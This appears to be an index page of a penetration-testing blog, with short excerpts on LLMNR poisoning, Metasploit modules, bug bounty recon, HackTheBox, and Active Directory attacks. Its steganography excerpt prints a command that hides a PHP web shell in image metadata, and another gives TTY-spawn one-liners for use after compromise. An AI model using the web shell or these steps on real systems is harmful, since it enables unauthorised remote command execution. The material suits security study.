Table of Contents The Concept LLMNR Related Attacks LLMNR/NBT-NS Poisoning Responder How It Works – The Source Code Initialization packet.py Servers Folder The Main Function LLMNR.py Check By Doing Analyze Network Traffic What If I Turn Off the MDNS Poisoner? Conclusion References This is the first article of my Active Directory Series. I’ll be reading…
Author: 0pr
Inside Metasploit – Write a Simple Exploit Module
Table of Contents The Intention Place to Start The Template Be Creative The Prototype The Real Request Next Steps References The really interesting thing begins right here, right now. I am going to dig into Metasploit and try to write a simple Metasploit module from scratch. The Intention The intention of doing this is to…
Getting Real With BugBounty – Passive Recon
Table of Contents Disclaimer Passive Recon BuiltWith Shodan.io Censys.io Hunter.io Summary Disclaimer Anything here on my blog, this article and all the others, is for educational purposes. Any misuse of the information is at your own risk. Disclaimer: Every article on this blog, including this one, is for study purposes only. The author accepts no responsibility for any misuse of the information. What Peter Kim (author of THP) suggests is to get your hands dirty. And the…
TheHackerPlayBook I – Section III – The Throw
Table of Contents Web Application Exploitation SQL Injection (SQLi) Cross-site Scripting (XSS) Cross-site Request Forgery (CSRF) Session Token Entropy Fuzzing/Input validation Business Logic Summary Web Application Exploitation First things first, two good resources for webapp pentest. OWASP WebApp Testing Guide The Web Application Hacker’s Handbook SQL Injection (SQLi) TODO Read more about SQL database, how…
TheHackerPlayBook I – Section II – The Drive
Table of Contents General Idea The Mentality Thing The Difference Within Responsibility Engagement Time Section II – The Drive – Exploiting Scanner Findings About Payloads DEP and ASLR DEP ASLR Take Aways General Idea This is going to be a note-taking article on reading the book The Hacker Playbook I. I will stop…
0x0C-HackTheBox-Resolute
Set up The target machine is at 10.10.10.169 Recon Nmap # Nmap 7.80 scan initiated Wed Apr 29 23:11:13 2020 as: nmap -A -T4 -p- -v -oN nmap.txt 10.10.10.169 Increasing send delay for 10.10.10.169 from 0 to 5 due to 60 out of 149 dropped probes since last increase. Increasing send delay for 10.10.10.169 from 5 to 10 due…
Fixing the Warning Messages That Keep Appearing When Starting and Using Metasploit
Problem Description Running msfconsole immediately produces the following warnings: ➜ recon msfconsole /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract_adapter.rb:84: warning: deprecated Object#=~ is called on Integer; it always returns nil /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract_adapter.rb:84: warning: deprecated Object#=~ is called on Integer; it always returns nil /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract_adapter.rb:84: warning: deprecated Object#=~ is called on Integer; it always returns nil The warnings keep appearing throughout the session and clutter the output. Solution Open the file /opt/metasploit/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract_adapter.rb, go to line 84, and change if config =~ SIMPLE_INT" to if…
Steganography
Table of Contents Hide Code in Pictures Hide Code in Pictures exiftool -DocumentName="<h1>TEST<br><?php if(isset(\$_REQUEST['cmd'])){echo '<pre>';\$cmd = (\$_REQUEST['cmd']);system(\$cmd);echo '</pre>';} __halt_compiler();?></h1>" <pic.[jpg|jpeg|png|gif]>
ActiveDirectory
Table of Contents Enumeration Overall Information Enum4linux PowerView Module Domain Objects DNS Info System Relationship BloodHound-python SharpHound.ps1 GPP Policy Foothold Asrep Roasting Lateral Movement Pass the Password Pass the Hash Dump NTLM Hashes Dump SAM/LSA Token Impersonation DLL Hijacking Dump NTDS Enumeration Overall Information Enum4linux You have nothing, just want an overview of the system…
TTYSpawn
Table of Contents Bash Python Bash SHELL=/bin/bash script -q /dev/null Python python -c 'import pty;pty.spawn("/bin/bash")'